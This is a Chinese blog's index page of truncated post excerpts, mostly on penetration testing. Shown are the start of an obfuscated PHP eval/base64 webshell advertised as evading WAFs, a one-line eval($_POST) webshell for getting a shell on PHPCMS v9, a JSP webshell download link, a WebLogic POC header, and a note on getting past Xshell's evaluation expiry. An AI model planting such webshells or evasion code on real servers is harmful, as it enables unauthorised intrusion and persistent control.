情感网文

###博客开启首页音乐轮换投稿###

2018-8-13 523 2     
博客开启音乐轮换,二天换一首歌曲 欢迎在下面回复你想轮换的音乐 注意:请带上音乐名字以及音乐的直连地址。 网易云直连API:http://music.163.com/song/media/outer/url?id=歌曲I...继续阅读 »
渗透测试

在线子域名在线查询接口版

2018-8-22 487 1     
根据百度云观测的接口:http://ce.baidu.com/index/getRelatedSites?site_address=写的 不过这接口查的真的不怎么准,写这个只为练习写写代码~~~ 后...继续阅读 »
渗透测试

2018最新过全WAF/CDN/D盾/安全狗小马Or大马

2018-7-31 908 2     
首先感谢土司大佬:Math_random 上代码---注意菜刀链接密码为:ximcx <?php $x="BaSe64"; $b="_deCOde"; $c=$x.$b; eval($cc = $c('JGhhbmRs...继续阅读 »
渗透测试

记录WebLogic(CVE-2017-10271)反序列化漏洞找WEBSHELL地址

2018-7-25 814 5     
首先,郭姓某牛丢来了一个有weblogic漏洞的地址http://x.x.x.x:7001 说用k8的weblogic2628去getshell不能链接shell,我也试了下,好像确实不能链接...... 接着...继续阅读 »
渗透测试

WebLogic T3 反序列化绕过漏洞(CVE-2018-2893)检测POC

2018-7-19 884 0     
脚本来自指尖安全B牛。原文地址:https://www.secfree.com/article-957.html #!env python # -*- coding: utf-8 -*- import so...继续阅读 »
渗透测试

JDK低版本Jsp大马---Jspspy

2018-7-14 681 1     
JDK低版本可用,感谢原作者,备份下 下载地址:http://ximcx.cn/content/uploadfile/201807/jspspy.txt <%@page pageEncoding="utf-8"%&g...继续阅读 »
渗透测试

[笔记]通杀PHPCMSv9 getshell

2018-6-5 933 0     
小结下: 菜刀马不能用get方式。开始一直失败~~~上传上去了,显示却是自己服务器的shell~~弄了好久终于好了~~ 菜刀马: <?php @eval($_POST[...继续阅读 »
渗透测试

爱奇艺游戏风云榜,电视剧,电影CSRF之你点击就收藏(官方SRC已忽略)

2018-5-31 788 3     
保存笔记而已~~~~~~ 本文涉及业务URL如下 1.http://top.iqiyi.com/youxi.html 2.http://www.iqiyi.com/u/fav 本文涉及漏洞URL...继续阅读 »
软件相关

解决Xshell和Xftp评估过期

2018-5-31 1169 0     
在百度下载的XFTP和XSHELL是国内代理奸商。。。。。。 然而过了大概几个月或者几周后,就会提示你,评估期已过,需要购买。。。 最重要的是,我安装选择的个人或者学校使用。。。还是会提示购...继续阅读 »
1 2 3 后页 尾页
sitemap